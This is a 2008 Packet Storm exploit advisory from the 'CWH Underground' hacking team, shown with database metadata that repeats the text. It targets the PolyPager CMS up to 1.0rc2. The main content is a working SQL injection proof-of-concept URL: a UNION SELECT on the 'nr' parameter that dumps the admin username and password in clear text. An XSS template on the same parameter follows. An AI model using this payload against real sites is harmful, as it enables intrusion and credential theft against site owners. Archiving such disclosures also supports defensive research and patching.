ID PACKETSTORM:67703
Type packetstorm
Reporter CWH Underground
Modified 2008-06-26T00:00:00
Description
`=================================================================
PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities
=================================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 26 June 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : PolyPager
VERSION : <= 1.0rc2
VENDOR : http://polypager.nicolashoening.de/
DOWNLOAD : http://downloads.sourceforge.net/polypager
#####################################################
--- Remote SQL Injection (nr) ---
---------
Exploit
---------
[+] http://[Target]/[polypager_path]/?[Web Page]&nr=[SQL Injection]
This exploit can dump username and password in clear text
-------------
POC Exploit
-------------
[+] http://192.168.24.25/polypager/?Test&nr=-999/**/UNION/**/SELECT/**/1,2,3,4,admin_name,admin_pass,7,8,9,10/**/FROM/**/_sys_sys--
--- Remote XSS ---
---------
Exploit
---------
[+] http://[Target]/polypager/?[Web Page]&nr=[XSS]
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
`
{"type": "packetstorm", "published": "2008-06-26T00:00:00", "reporter": "CWH Underground", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "5c18500ca1dc549f8b0edbf0da37df59"}, {"key": "modified", "hash": "14986f4bc6cdf577b55975cf734abe7e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "14986f4bc6cdf577b55975cf734abe7e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9e864242aef94fd273fa0c68ff07fa6a"}, {"key": "sourceData", "hash": "d01b516e3b0a7f2e6ba8bade08124d11"}, {"key": "sourceHref", "hash": "0d6080035c06e1e00721a130f19eb965"}, {"key": "title", "hash": "2f9ffe8f2887ecfa5e29f7c1928aa85d"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`================================================================= \nPolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities \n================================================================= \n \n,--^----------,--------,-----,-------^--, \n| ||||||||| `--------' | O .. CWH Underground Hacking Team .. \n`+---------------------------^----------| \n`\\_,-------, _________________________| \n/ XXXXXX /`| / \n/ XXXXXX / `\\ / \n/ XXXXXX /\\______( \n/ XXXXXX / \n/ XXXXXX / \n(________( \n`------' \n \n \nAUTHOR : CWH Underground \nDATE : 26 June 2008 \nSITE : cwh.citec.us \n \n \n##################################################### \nAPPLICATION : PolyPager \nVERSION : <= 1.0rc2 \nVENDOR : http://polypager.nicolashoening.de/ \nDOWNLOAD : http://downloads.sourceforge.net/polypager \n##################################################### \n \n--- Remote SQL Injection (nr) --- \n \n--------- \nExploit \n--------- \n \n[+] http://[Target]/[polypager_path]/?[Web Page]&nr=[SQL Injection] \n \nThis exploit can dump username and password in clear text \n \n------------- \nPOC Exploit \n------------- \n \n[+] http://192.168.24.25/polypager/?Test&nr=-999/**/UNION/**/SELECT/**/1,2,3,4,admin_name,admin_pass,7,8,9,10/**/FROM/**/_sys_sys-- \n \n \n--- Remote XSS --- \n \n--------- \nExploit \n--------- \n \n[+] http://[Target]/polypager/?[Web Page]&nr=[XSS] \n \n################################################################## \n# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # \n################################################################## \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:20:24", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/67703/polypager-sqlxss.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/67703/polypager-sqlxss.txt", "title": "polypager-sqlxss.txt", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:20:24"}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:24"}, "vulnersScore": -0.3}, "references": [], "id": "PACKETSTORM:67703", "hash": "0caddd142562ca447bc9c6e904c535c207c5c00bbcf96723231b71d27eed36e8", "edition": 1, "cvelist": [], "modified": "2008-06-26T00:00:00", "description": ""}
{}